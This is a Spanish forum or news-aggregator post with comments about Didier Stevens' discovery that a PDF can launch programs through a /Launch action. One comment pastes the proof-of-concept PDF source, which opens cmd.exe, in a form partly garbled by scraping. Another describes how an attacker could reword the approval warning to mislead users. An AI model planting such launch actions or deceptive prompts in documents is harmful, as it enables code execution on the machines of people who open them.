Hace 14 años | Por pcmaster a applesana.es
Publicado hace 14 años por pcmaster a applesana.es

Esto es lo ultimo en seguridad y para estar preocupados, un hacker, un tal Didier Stevens ha descubierto una forma de ejecutar código en un pdf sin explotar ninguna vulneridad del sistema operativo.

Comentarios

D

El pdf que ejecuta la consola de comandos por dentro:

%PDF-1.1

1 0 obj
>
endobj

2 0 obj
>
endobj

3 0 obj
>
endobj

4 0 obj
>
>>
endobj

5 0 obj
>
stream
BT
/F1 24 Tf
100 700 Td
(Hello World)Tj
ET
endstream
endobj

6 0 obj
[/PDF /Text]
endobj

7 0 obj
>
endobj

8 0 obj
strong/Type /Action/strong
strong/S /Launch/strong
strong/Win/strong
strong/strong
strong/F (cmd.exe)/strong
strong/strong
strong>

endobj

xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
>
startxref
751
%%EOF

sorrillo

El usuario debe aprobar la ejecución (excepto en FoxitReader) pero el atacante puede personalizar el mensaje que se muestra al usuario.

No se especifica pero entiendo que incluso podría cambiar el sentido de la advertencia. Pasar de "Quiere permitir la ejecución ?" a "Quiere bloquear la ejecución ?".